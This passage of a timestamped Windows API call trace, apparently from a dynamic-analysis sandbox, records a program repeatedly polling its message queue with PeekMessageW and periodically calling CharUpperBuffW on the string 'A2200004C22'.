lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.710] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.711] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.712] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.713] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.714] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.714] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.714] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.714] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.714] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.714] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.714] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.714] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.714] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.714] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.714] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.714] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.714] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.714] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.717] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.717] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.717] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.717] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.717] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.717] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.717] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.717] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.717] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.717] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.717] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.718] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.719] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.720] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.720] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, 